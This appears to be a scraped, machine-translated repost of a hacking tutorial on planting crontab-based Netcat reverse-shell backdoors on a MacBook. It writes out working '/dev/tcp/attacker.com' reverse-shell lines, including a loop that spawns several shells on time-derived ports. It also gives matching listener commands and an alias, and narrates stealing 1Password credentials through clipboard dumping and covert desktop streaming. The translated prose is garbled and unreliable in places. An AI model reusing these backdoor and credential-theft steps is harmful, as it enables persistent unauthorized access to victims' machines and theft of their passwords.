قالب وردپرس درنا توس
Home / Tips and Tricks / How to spawn with multiple threaded Netcat backdoors on a MacBook «Zero Replacement :: WonderHowTo

How to spawn with multiple threaded Netcat backdoors on a MacBook «Zero Replacement :: WonderHowTo



An attacker could create three, five, or even ten new Netcat connections to a compromised MacBook with a command. Carrying out complex attacks after exploitation can otherwise be difficult from a single shell without this essential trick.

Why create multiple Netcat threads?

With some post-exploitation macOS attacks, more than one shell may be required. Playing additional Netcat connections from a single back door is possible but can be cumbersome and inconvenient. So I came up with a simple solution that relies on the current date to predict the next time and port number the back door will use.

Five Netcat connections established at once.

The GIF above shows that five Netcat connections are established simultaneously. We can see how convenient it is to navigate multiple connections when performing some basic system_profile awareness attacks.

The following string is an example of a Bash command, commonly used with crontab for macOS backdoor. It creates a single TCP connection to the attacker’s system. It is a well-known method for establishing TCP connections to a Netcat listener and can be embedded in the operating system and run every sixty seconds.

* * * * *    bash -i >& /dev/tcp/attacker.com/8080 0>&1

Crontab will attempt to connect to the attacker’s server on port 8080 each time. However, if a connection has already been established, the command fails silently when the port is busy. The attacker’s remote access is restricted to a persistent backdoor with this use.

The command can be changed so that it has a dynamic port number, defined by the current minute.

* * * * *    bash -i >& /dev/tcp/attacker.com/$(date +%M) 0>&1

notice date command with % M alternative. If it is 10:15, port 15 will be used. If the time is 03:42, port 42 will be used. What the protocol is in time is what the port would be. This would dramatically reduce the number of port conflicts that occur and allow the attacker to open a new Netcat connection every minute if needed.

Create predictive Netcat listeners

To create a listener for dynamic gates, everything an attacker needs to look at current time. If it was 19:30, the command below would catch on Next connection.

~$ nc -l -p 31

The next expected connection must be used because both macOS and Kali can use the same time. Which means Kali could miss the connection just milliseconds late. The listener and the connection cannot be established at the same time. Kali must be predictive and wait for the next connection attempt.

To automate the process a bit, date can also be used in Kali with sixty seconds more.

~$ nc -l -p $(date +%M --date "+60 seconds")

Create multiple simultaneous connections

It seemed logical to pick up a notch and let the back door create multiple connections at once. The following for loop is a simple example of how this can be achieved.

* * * * *   for i in {1..3};do bash -i >& /dev/tcp/attacker.com/$i$(date +%M) 0>&1 & done

The for loop will run bash command three times ({1..3}). Three connection attempts every sixty seconds creates a lot of noise in the network but works for demonstration purposes. Any more attempts per minute is probably dead. The variable $ i added in minutes and used as port number.

If the current time is 05:45, three connections will be made with ports 145, 245 and 345.

Creating three predictive Netcat listeners is difficult. In general, Tilix is ​​my preferred terminal multiplexer because it allows multiple shells in a single window (shown below). It has the ability to share automatically (-a) the window in half while driving (-e) A command.

Tilix can be installed in Kali with the following command.

~$ sudo apt update && sudo apt install tilix

 Hit:1 http://dl.google.com/linux/chrome/deb stable InRelease
Hit:3 http://kali.download/kali kali-rolling InRelease
Ign:2 https://dl.bintray.com/etcher/debian stable InRelease
Err:4 https://dl.bintray.com/etcher/debian stable Release
  403  Forbidden [IP: 54.148.239.199 443]
Reading package lists... Done

Reading package lists... Done
Building dependency tree
Reading state information... Done
The following additional packages will be installed:
  libgtkd-3-0 libphobos2-ldc-shared91 libvted-3-0 tilix-common
Suggested packages:
  python-nautilus
The following NEW packages will be installed:
  libgtkd-3-0 libphobos2-ldc-shared91 libvted-3-0 tilix tilix-common
0 upgraded, 5 newly installed, 0 to remove and 857 not upgraded.
Need to get 4,053 kB of archives.
After this operation, 25.2 MB of additional disk space will be used.
Do you want to continue? [Y/n] y
Get:1 http://kali.download/kali kali-rolling/main amd64 libphobos2-ldc-shared91 amd64 1:1.21.0-1+b1 [1,265 kB]
Get:2 http://kali.download/kali kali-rolling/main amd64 libgtkd-3-0 amd64 3.9.0-3+b3 [1,892 kB]
Get:3 http://kali.download/kali kali-rolling/main amd64 libvted-3-0 amd64 3.9.0-3+b3 [86.1 kB]
Get:4 http://kali.download/kali kali-rolling/main amd64 tilix-common all 1.9.3-4 [211 kB]
Get:5 http://kali.download/kali kali-rolling/main amd64 tilix amd64 1.9.3-4+b2 [599 kB]
Fetched 4,053 kB in 1s (3,717 kB/s)
Selecting previously unselected package libphobos2-ldc-shared91:amd64.
(Reading database ... 377083 files and directories currently installed.)
Preparing to unpack .../libphobos2-ldc-shared91_1%3a1.21.0-1+b1_amd64.deb ...
Unpacking libphobos2-ldc-shared91:amd64 (1:1.21.0-1+b1) ...
Selecting previously unselected package libgtkd-3-0.
Preparing to unpack .../libgtkd-3-0_3.9.0-3+b3_amd64.deb ...
Unpacking libgtkd-3-0 (3.9.0-3+b3) ...
Selecting previously unselected package libvted-3-0.
Preparing to unpack .../libvted-3-0_3.9.0-3+b3_amd64.deb ...
Unpacking libvted-3-0 (3.9.0-3+b3) ...
Selecting previously unselected package tilix-common.
Preparing to unpack .../tilix-common_1.9.3-4_all.deb ...
Unpacking tilix-common (1.9.3-4) ...
Selecting previously unselected package tilix.
Preparing to unpack .../tilix_1.9.3-4+b2_amd64.deb ...
Unpacking tilix (1.9.3-4+b2) ...
Setting up tilix-common (1.9.3-4) ...
Setting up libphobos2-ldc-shared91:amd64 (1:1.21.0-1+b1) ...
Setting up libvted-3-0 (3.9.0-3+b3) ...
Setting up libgtkd-3-0 (3.9.0-3+b3) ...
Setting up tilix (1.9.3-4+b2) ...
Processing triggers for desktop-file-utils (0.24-1) ...
Processing triggers for mime-support (3.64) ...
Processing triggers for hicolor-icon-theme (0.17-2) ...
Processing triggers for gnome-menus (3.36.0-1) ...
Processing triggers for libglib2.0-0:amd64 (2.64.2-1) ...
Processing triggers for libc-bin (2.30-4) ...
Processing triggers for man-db (2.9.1-1) ...
Processing triggers for kali-menu (2020.2.2) ...

In the previous GIF, the “hacker” command was used to play five Netcat listeners automatically. This is accomplished by using Bash aliases. The alias executes the following command.

hacker ()
{
    for i in {1..3};
    do
        tilix -a session-add-down -e "nc -l -p $i$(date +%M --date "+60 seconds")";
    done
}

I Kali, a for loop with date command is also used to generate Netcat listeners. The – date “+60 seconds” the option has also been added, which takes the current time and adds sixty seconds. This ensures that listeners do not miss the next crontab interval.

To create aliases, open the file /root/.bash_aliases with nano and add the function above. Then use Ctrl-X to stop, strike Get on, then save it with AND. If you do not already have the file, it will create it for you.

~$ sudo nano /root/.bash_aliases

Below is a GIF of multiple shells used in a more realistic scenario.

Two separate attacks occur in the GIF. There is clipboard dumping to steal 1Password references and streaming streaming on the desktop to gather intelligence about the target’s online behavior. The activity, in order from the top shell to the bottom, is:

  1. Prepares an FFmpeg listener to listen to video streams from the compromised MacBook.
  2. The pbpaste command is used to dump MacBook clippings every five seconds. 1Password references are captured in the process and saved in the /tmp/clipboard.txt file.
  3. Downloads FFmpeg to MacBook and streams to desktop.
  4. This connection is mostly unused during the attacks. It is used towards the end to read the file /tmp/clipboard.txt and learn usernames and passwords.
  5. MPV plays the video sent from the MacBook, allowing the attacker to see the target surfing the web and logging in to a WonderHowTo account using 1Password.

What took two minutes to achieve may have taken longer if the attacker had not set up a multi-threaded back door. Multiple connections are important when performing various attacks.

Final thoughts

All of these examples involve crontab running an arbitrary command every sixty seconds. Realistically, executions can take place once an hour or five hours to minimize the amount of traffic coming from the MacBook. Nevertheless, all predictive examples can be applied to hours or every day.

The possibilities do not end here. While this article target is macOS, similar multithreaded connections can be configured and automated with PowerShell payloads in Windows 10.

Keep in mind that established Netcat connections are already easy to detect by automated detection systems. Multiple connections are best used in low-security environments for that reason. Too many Netcat threads can also cause the target computer to experience a slower internet connection or heat up. Think about how much data each connection creates as it can destroy the attack.

If you liked this article, follow me on Twitter @tokyoneon_ and GitHub to keep up with my current projects. For questions and problems, leave a comment or let me know on Twitter.

Want To Get Into The Gift Basket Business? Jump your career with hat hacking with our training package Premium Ethical Hacking Certification 2020 from the new Null Byte Shop and get over 60 hours of training from professional ethical hacking.

Buy now (90% off)>

Cover photo by Pixabay / PEXELS; screenshot and GIF of tokyoneon / Zero Byte




Source link